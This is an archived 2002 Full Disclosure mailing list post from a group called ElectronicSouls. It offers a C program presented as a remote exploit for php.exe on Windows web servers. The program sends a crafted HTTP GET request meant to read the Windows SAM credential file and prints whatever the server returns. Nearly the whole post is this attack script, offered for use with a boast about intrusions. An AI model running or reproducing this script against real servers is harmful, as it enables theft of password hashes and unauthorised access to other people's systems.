Full Disclosure mailing list archives
[ElectronicSouls] - 0day PHP Exploit
From: es () hush com
Date: Fri, 29 Nov 2002 12:53:24 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here is an exploit for a now-known bug in php. Do not abuse!@# # cat ES-php-windoze.c /* * PROPERTY OF THE ELECTRONICSOULS CREW ! * DO NOT DISTRIBUTE WITHOUT PERMISSION ! * * (C) BrainStorm - 2k2 * * * quick shoutz: SectorX,ghQst,RobBbot,it_fresh * FreQ,BuRn-X,0x90,roc..and all other ES members !! * */ #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <stdlib.h> #include <errno.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #define GREEN "\033[01;32m" #define RED "\033[01;31m" #define NORM "\033[00;00m" #define BOLD "\033[00;01m" int main(int argc, char **argv[]) { struct sockaddr_in sin; struct hostent *host; char buf[8192]; int sock, ES, len; if (argc != 2) { printf("\n*** (C) ElectronicSouls *** \n\n * Usage: %s <host> \n",argv[0]); exit(0); } host = gethostbyname((void *)argv[1]); sock = socket(AF_INET, SOCK_STREAM, 0); bzero(&(sin.sin_zero), 8); sin.sin_family = AF_INET; sin.sin_addr.s_addr = htonl(INADDR_ANY); sin.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr; sin.sin_port = htons(80); ES = connect(sock, (void *)&sin, sizeof(sin)); if (ES == -1) { perror(RED"[*] Connecting.."); printf(NORM"\n"); exit(1); } printf(GREEN"\n\n[ ElectronicSouls ] - php.exe remote exploit\n"); printf(GREEN"(C) BrainStorm - 2002 \n\n"); printf(RED"[*] Connected to %s\n"NORM, argv[1]); memset(&buf, 0, sizeof(buf)); sprintf(buf, "GET /php/php.exe?c:\winnt\repair\sam HTTP/1.0\n\n", argv[1]); printf(GREEN"[*] Sending exploit string..\n"NORM, argv[1]); send(sock, buf, sizeof(buf), 0); while (1) { memset(&buf, 0, sizeof(buf)); len = sizeof(buf); ES = read(sock, &buf, len); if (ES <= 0) exit(0); printf(BOLD"%s\n"NORM, buf); perror("Status"); } printf(NORM"\n"); } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Responsible for all Project Honeynet Intrusions." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3n09gMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltfNUAn39Jnl1zHMvb Q3niwEddPjdBK8yrAJ47Kg17dso8hCNGXOhtX9NqkQqhIw== =Yxss -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - 0day PHP Exploit es (Nov 29)